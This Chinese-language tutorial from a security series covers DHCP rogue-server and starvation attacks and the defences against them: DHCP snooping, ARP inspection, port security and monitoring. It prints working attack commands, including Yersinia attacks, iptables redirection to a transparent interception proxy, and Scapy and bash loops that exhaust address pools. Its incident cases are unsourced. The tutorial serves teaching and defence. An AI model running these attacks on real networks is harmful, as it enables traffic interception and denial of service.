Day-016-DHCP安全与攻击防护

# Day 15: DHCP 安全与攻击防护

> 网络安全系列第 15 天 | 预计阅读时间：30 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [引言](#引言)
2. [DHCP 协议基础](#dhcp 协议基础)
3. [DHCP 安全威胁](#dhcp 安全威胁)
4. [Rogue DHCP 攻击](#rogue-dhcp 攻击)
5. [DHCP 饥饿攻击](#dhcp 饥饿攻击)
6. [实验环境搭建](#实验环境搭建)
7. [实战演练](#实战演练)
8. [防护策略与最佳实践](#防护策略与最佳实践)
9. [总结与思考](#总结与思考)
10. [参考资料](#参考资料)

---

## 引言

### DHCP 的关键作用

DHCP（Dynamic Host Configuration Protocol）是网络自动化的核心协议，负责为网络设备自动分配 IP 地址、网关、DNS 等配置信息。没有 DHCP，现代企业网络将无法高效运转。

**DHCP 分配的关键信息**：
-  IP 地址和子网掩码
-  默认网关
- 卡片 DNS 服务器
-  租约时间
- 工具 其他选项（NTP、WINS 等）

**安全影响**：
- 攻击者可通过 DHCP 劫持整个网络流量
- 可实施中间人攻击
- 可导致网络服务中断
- 可窃取用户敏感信息

### 真实案例

```
案例 1: 企业 DHCP 劫持（2019）
- 攻击者接入会议室网络
- 部署 Rogue DHCP 服务器
- 分配恶意 DNS 服务器
- 用户访问假冒的银行网站
- 损失：50 万美元

案例 2: DHCP 饥饿攻击（2020）
- 攻击者耗尽 IP 地址池
- 合法用户无法获取 IP
- 导致办公网络中断 4 小时
- 影响：2000+ 员工

案例 3: 酒店网络钓鱼（2021）
- 攻击者伪装成酒店 WiFi
- 通过 DHCP 分配恶意网关
- 拦截客人信用卡信息
- 影响：数百名客人
```

---

## DHCP 协议基础

### DHCP 工作流程（DORA）

```
DHCP 四步流程：

1. Discover（发现）
   客户端 → 广播：DHCP Discover
   "有 DHCP 服务器吗？"
   
2. Offer（提供）
   服务器 → 广播：DHCP Offer
   "我在这里，给你 IP 192.168.1.100"
   
3. Request（请求）
   客户端 → 广播：DHCP Request
   "我要用 192.168.1.100 了"
   
4. Acknowledge（确认）
   服务器 → 广播：DHCP ACK
   "好的，租约 24 小时"

数据包格式：
┌─────────────────────────────────────┐
│ OP (1byte) │ HTYPE │ HLEN │ HOPS   │
├─────────────────────────────────────┤
│ Transaction ID (4bytes)             │
├─────────────────────────────────────┤
│ Seconds │ Flags                     │
├─────────────────────────────────────┤
│ Client IP Address (4bytes)          │
├─────────────────────────────────────┤
│ Your IP Address (4bytes)            │
├─────────────────────────────────────┤
│ Server IP Address (4bytes)          │
├─────────────────────────────────────┤
│ Gateway IP Address (4bytes)         │
├─────────────────────────────────────┤
│ Client Hardware Address (16bytes)   │
├─────────────────────────────────────┤
│ Server Hostname (64bytes)           │
├─────────────────────────────────────┤
│ Boot File Name (128bytes)           │
├─────────────────────────────────────┤
│ Options (可变长度)                   │
└─────────────────────────────────────┘
```

### DHCP 选项详解

```
常用 DHCP 选项：

Option 1: 子网掩码
Option 3: 默认网关
Option 6: DNS 服务器
Option 12: 主机名
Option 15: 域名
Option 42: NTP 服务器
Option 43: 厂商特定信息
Option 66: TFTP 服务器（PXE 启动）
Option 67: 启动文件名
Option 121: 无类别路由

恶意利用：
- Option 6: 分配恶意 DNS
- Option 66/67: PXE 启动攻击
- Option 121: 路由劫持
```

---

## DHCP 安全威胁

### 威胁分类

```
1. Rogue DHCP 服务器
   风险等级：★★★★★
   影响：流量劫持、中间人攻击
   
2. DHCP 饥饿攻击
   风险等级：★★★★☆
   影响：拒绝服务
   
3. DHCP 欺骗
   风险等级：★★★☆☆
   影响：绕过访问控制
   
4. DHCP 信息泄露
   风险等级：★★★☆☆
   影响：网络拓扑暴露
   
5. DHCP 配置篡改
   风险等级：★★★★☆
   影响：网络配置错误
```

### 风险评估矩阵

| 攻击类型 | 可能性 | 影响 | 风险等级 |
|----------|--------|------|----------|
| Rogue DHCP | 高 | 严重 | 严重 |
| DHCP 饥饿 | 中 | 中等 | 高 |
| DHCP 欺骗 | 中 | 中等 | 中 |
| 信息泄露 | 高 | 低 | 中 |
| 配置篡改 | 低 | 严重 | 中 |

---

## Rogue DHCP 攻击

### 攻击原理详解

```
攻击流程：

1. 攻击者接入网络
   - 物理接入（会议室、办公区）
   - 无线接入（Guest WiFi）
   - 远程接入（被攻陷的 IoT 设备）

2. 部署 Rogue DHCP 服务器
   工具：
   - Yersinia
   - dhcpd (ISC)
   - 自定义脚本

3. 响应 DHCP Discover
   - 攻击者先于合法服务器响应
   - 客户端接受第一个 Offer

4. 分配恶意配置
   IP 地址：192.168.1.100
   网关：攻击者 IP（192.168.1.1）
   DNS: 攻击者控制的 DNS

5. 流量劫持
   - 所有流量经过攻击者
   - 可窃听、篡改
   - 可重定向到钓鱼网站
```

### 攻击演示（Yersinia）

```bash
# 1. 安装 Yersinia
apt install yersinia

# 2. 启动图形界面
yersinia -G

# 3. 选择 DHCP 攻击
# 界面操作：
# - 选择 DHCP 协议
# - Launch Attack
# - DHCP OFFER

# 4. 命令行模式
yersinia -d 0 -attack dhcp_offer

# 5. 配置恶意参数
# - 网关：攻击者 IP
# - DNS: 攻击者 DNS
```

### 中间人攻击实施

```bash
# 攻击者配置示例

# 1. 启用 IP 转发
echo 1 > /proc/sys/net/ipv4/ip_forward

# 2. 配置 iptables 转发
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 攻击者 IP:8080
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 攻击者 IP:8443

# 3. 启动恶意代理
mitmproxy --mode transparent --showhost

# 4. 受害者访问
# www.bank.com → 攻击者代理 → 真实银行网站
# 攻击者可看到所有 HTTP 流量
# HTTPS 流量可尝试 SSL 剥离
```

---

## DHCP 饥饿攻击

### 攻击原理

```
攻击目标：耗尽 DHCP 地址池

攻击方法：

1. MAC 地址欺骗
   - 伪造大量 MAC 地址
   - 每个 MAC 请求一个 IP
   - 快速耗尽地址池

2. DHCP Request 洪水
   - 发送大量 DHCP Request
   - 不完成 DORA 流程
   - 占用 IP 不释放

3. 租约保持
   - 定期续租
   - IP 不释放回池
   - 长期占用
```

### 攻击工具

```bash
# 1. Yersinia DHCP 攻击
yersinia -d 0 -attack dhcp_discover

# 2. 自定义脚本（Scapy）
from scapy.all import *
import random

for i in range(1000):
    mac = "00:11:22:33:%02x:%02x" % (random.randint(0,255), random.randint(0,255))
    dhcp_discover = Ether(src=mac)/IP(src="0.0.0.0", dst="255.255.255.255")/ \
                   UDP(sport=68, dport=67)/BOOTP(chaddr=mac)/ \
                   DHCP(options=[("message-type", "discover"), "end"])
    sendp(dhcp_discover)

# 3. DHCPstarv 工具
dhcpstarv -i eth0 -m 00:11:22:33:44:55
```

### 影响分析

```
攻击影响：

1. 新用户无法接入
   - 获取不到 IP 地址
   - 无法访问网络
   - 业务中断

2. 现有用户影响
   - 租约到期后无法续租
   - 逐渐失去连接
   - 网络不稳定

3. 恢复时间
   - 等待租约过期（通常 24 小时）
   - 或手动清除租约
   - 业务影响持久
```

---

## 实验环境搭建

### 拓扑结构

```
┌─────────────────────────────────────────┐
│            隔离实验网络                  │
│                                         │
│  ┌─────────────┐    ┌─────────────┐    │
│  │  攻击机     │    │  合法 DHCP   │    │
│  │  (Kali)     │    │  服务器      │    │
│  │  192.168.1  │    │  192.168.1  │    │
│  └──────┬──────┘    └──────┬──────┘    │
│         │                  │            │
│         └────────┬─────────┘            │
│                  │                       │
│           ┌──────▼──────┐               │
│           │   交换机     │               │
│           │  (可管理)    │               │
│           └──────┬──────┘               │
│                  │                       │
│    ┌─────────────┼─────────────┐        │
│    │             │             │        │
│ ┌──▼──┐     ┌───▼───┐    ┌───▼───┐    │
│ │Victim│     │Victim │    │Victim │    │
│ │  1   │     │   2   │    │   3   │    │
│ └─────┘     └───────┘    └───────┘    │
└─────────────────────────────────────────┘
```

### 合法 DHCP 服务器配置

```bash
# ISC DHCP Server 配置
# /etc/dhcp/dhcpd.conf

# 全局配置
default-lease-time 600;
max-lease-time 7200;
authoritative;

# 日志
log-facility local7;

# 子网配置
subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.100 192.168.1.200;
  option routers 192.168.1.1;
  option subnet-mask 255.255.255.0;
  option broadcast-address 192.168.1.255;
  option domain-name-servers 8.8.8.8, 8.8.4.4;
  option domain-name "example.com";
  
  # 静态分配示例
  host server1 {
    hardware ethernet 00:11:22:33:44:55;
    fixed-address 192.168.1.50;
  }
}

# 启动服务
systemctl enable isc-dhcp-server
systemctl start isc-dhcp-server
```

---

## 实战演练

### 实验 1: DHCP 信息收集

**目标**：了解网络 DHCP 配置

**步骤**：

```bash
# 1. 查看当前 DHCP 配置
ipconfig /all  # Windows
ifconfig && cat /etc/resolv.conf  # Linux

# 2. 捕获 DHCP 流量
tcpdump -i eth0 -n port 67 or port 68 -w dhcp.pcap

# 3. 触发 DHCP 请求
dhclient -r eth0  # 释放
dhclient eth0     # 重新获取

# 4. 分析 DHCP 包
wireshark dhcp.pcap
# 查看：
# - DHCP 服务器 IP
# - 分配的 IP 范围
# - 网关和 DNS
# - 租约时间
```

### 实验 2: Rogue DHCP 检测

**目标**：识别恶意 DHCP 服务器

**步骤**：

```bash
# 1. 使用 Yersinia 检测
yersinia -G
# 选择 DHCP → Listen
# 查看 DHCP 服务器列表

# 2. 使用 dhcping 探测
dhcping -s 192.168.1.1 -c 192.168.1.100 -h 00:11:22:33:44:55

# 3. 监控 DHCP 流量
tcpdump -i eth0 -n 'port 67'
# 观察：
# - 是否有未知 DHCP 服务器
# - Offer 包来源

# 4. 检查 DHCP 服务器认证
# 企业环境应仅允许授权服务器
```

### 实验 3: DHCP 饥饿攻击演示

! **警告**：仅在隔离环境测试

**步骤**：

```bash
# 1. 监控 DHCP 地址池
# 在 DHCP 服务器上
cat /var/lib/dhcp/dhcpd.leases | grep lease | wc -l

# 2. 发动饥饿攻击
# 攻击机执行
for i in {1..200}; do
  mac="00:11:22:33:44:$(printf '%02x' $i)"
  dhclient -d -sf /bin/true -H "test$i" -hw ether $mac eth0 &
done

# 3. 观察地址池耗尽
# DHCP 服务器上监控
watch -n 1 'cat /var/lib/dhcp/dhcpd.leases | grep lease | wc -l'

# 4. 测试新用户接入
# 新客户端应无法获取 IP

# 5. 恢复
# 停止攻击
# 清除租约
dhcpd -r
systemctl restart isc-dhcp-server
```

### 实验 4: 交换机防护配置

**目标**：配置 DHCP Snooping

**步骤**：

```bash
# Cisco 交换机配置

# 1. 启用 DHCP Snooping
ip dhcp snooping
ip dhcp snooping vlan 10

# 2. 配置信任端口（连接合法 DHCP 服务器）
interface GigabitEthernet1/0/1
  description Connected-to-DHCP-Server
  ip dhcp snooping trust
  exit

# 3. 配置非信任端口（连接用户）
interface range GigabitEthernet1/0/2-24
  description Connected-to-Users
  no ip dhcp snooping trust
  ip dhcp snooping limit rate 10
  exit

# 4. 验证配置
show ip dhcp snooping
show ip dhcp snooping binding

# 5. 测试防护
# 从非信任端口连接 Rogue DHCP
# 应被交换机阻止
```

---

## 防护策略与最佳实践

### 交换机安全配置

#### DHCP Snooping

```bash
# 完整配置模板

# 启用 DHCP Snooping
ip dhcp snooping
ip dhcp snooping vlan 10,20,30

# 配置信任端口
interface GigabitEthernet1/0/1
  ip dhcp snooping trust
  ip dhcp snooping limit rate 100

# 配置非信任端口
interface range GigabitEthernet1/0/2-48
  no ip dhcp snooping trust
  ip dhcp snooping limit rate 10
  
  # 防止 MAC 欺骗
  switchport port-security
  switchport port-security maximum 2
  switchport port-security violation restrict
  
  # 防止 DHCP 攻击
  ip dhcp snooping verify mac-address

# 数据库保存（重启后保留绑定）
ip dhcp snooping database flash:/dhcp_snooping.db
ip dhcp snooping database write-delay 300

# 验证
show ip dhcp snooping
show ip dhcp snooping binding
show ip dhcp snooping database
```

#### Dynamic ARP Inspection (DAI)

```bash
# 配合 DHCP Snooping 使用

# 启用 DAI
ip arp inspection vlan 10

# 信任端口
interface GigabitEthernet1/0/1
  ip arp inspection trust

# 非信任端口
interface range GigabitEthernet1/0/2-48
  no ip arp inspection trust
  ip arp inspection limit rate 100
  ip arp inspection validate src-mac dst-mac ip

# 验证
show ip arp inspection vlan 10
show ip arp inspection statistics
```

### 企业级防护架构

```
推荐部署：

1. 接入层交换机
   ✓ DHCP Snooping
   ✓ DAI (Dynamic ARP Inspection)
   ✓ 端口安全（Port Security）
   ✓ 802.1X 认证

2. 分布层交换机
   ✓ DHCP Snooping
   ✓ 信任端口配置
   ✓ 流量监控

3. 核心层
   ✓ 仅信任授权 DHCP 服务器
   ✓ 监控 DHCP 流量
   ✓ 告警异常

4. 无线控制器
   ✓ DHCP Snooping
   ✓ 客户端隔离
   ✓ 访客网络分段
```

### 监控与检测

```bash
# 1. DHCP 服务器日志监控
# /var/log/syslog
grep -i "dhcp" /var/log/syslog | tail -100

# 2. 异常检测规则
# - 多个 DHCP 服务器响应
# - 未知 DHCP 服务器
# - 异常高的 DHCP 请求率
# - 地址池快速耗尽

# 3. SIEM 集成
# 发送日志到 SIEM
# 配置告警规则

# 4. 定期审计
# - 检查信任端口配置
# - 验证 DHCP Snooping 状态
# - 审查 DHCP 租约
```

### 响应流程

```
DHCP 攻击响应流程：

1. 检测与确认
   - 监控告警
   - 流量分析
   - 确认攻击类型

2. 遏制
   - 隔离受影响的端口
   - 阻止 Rogue DHCP
   - 限制攻击源

3. 根除
   - 定位攻击设备
   - 物理断开或禁用端口
   - 清除恶意配置

4. 恢复
   - 重启 DHCP 服务
   - 清除租约
   - 恢复正常服务

5. 总结
   - 根本原因分析
   - 改进防护措施
   - 更新文档
```

---

## 总结与思考

### 核心要点回顾

1. **DHCP 威胁严重性**
   - Rogue DHCP 可劫持整个网络
   - 饥饿攻击可导致服务中断
   - 防护至关重要

2. **关键防护技术**
   - DHCP Snooping（最有效）
   - DAI（配合使用）
   - 端口安全
   - 802.1X 认证

3. **监控与响应**
   - 持续监控 DHCP 流量
   - 快速检测异常
   - 完善响应流程

### 深入思考问题

1. **IoT 设备 DHCP 安全**
   - IoT 设备通常无防护
   - 如何防止被攻陷？
   - 网络分段必要性？

2. **无线 DHCP 安全**
   - Guest WiFi 风险
   - 客户端隔离
   - 认证机制？

3. **云环境 DHCP**
   - VPC DHCP 实现
   - 与传统网络差异
   - 安全考虑？

### 实战建议

**中小企业**：
1. 启用 DHCP Snooping
2. 配置信任端口
3. 监控 DHCP 日志
4. 定期安全审计

**大型企业**：
1. 全面部署 DHCP Snooping
2. 配合 DAI 使用
3. 实施 802.1X
4. SIEM 集成监控
5. 自动化响应

**云环境**：
1. 使用云提供商 DHCP
2. 安全组隔离
3. 网络 ACL
4. 监控云 DHCP 日志

### 下一步学习建议

- **深入交换机安全**：Cisco/Nexus 配置
- **802.1X 认证**：NAC 实施
- **网络分段**：VLAN 安全
- **无线安全**：WPA3、企业认证

---

## 参考资料

### 标准文档
- RFC 2131 (DHCP)
- RFC 2132 (DHCP Options)
- RFC 3046 (DHCP Relay Agent Information)

### 工具资源
- [ISC DHCP](https://www.isc.org/dhcp/)
- [Yersinia](https://www.yersinia.net/)
- [Scapy](https://scapy.net/)

### 在线资源
- [Cisco DHCP Snooping](https://www.cisco.com/c/en/us/support/docs/lan-switching/ethernet/19138-123.html)
- [DHCP 安全最佳实践](https://www.sans.org/)

### 书籍推荐
- 《交换机安全配置指南》
- 《网络攻击与防御》
- 《企业网络安全架构》

---

**标记 明日预告**：Day 16 - ICMP 协议安全分析

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 15 篇，精编版本*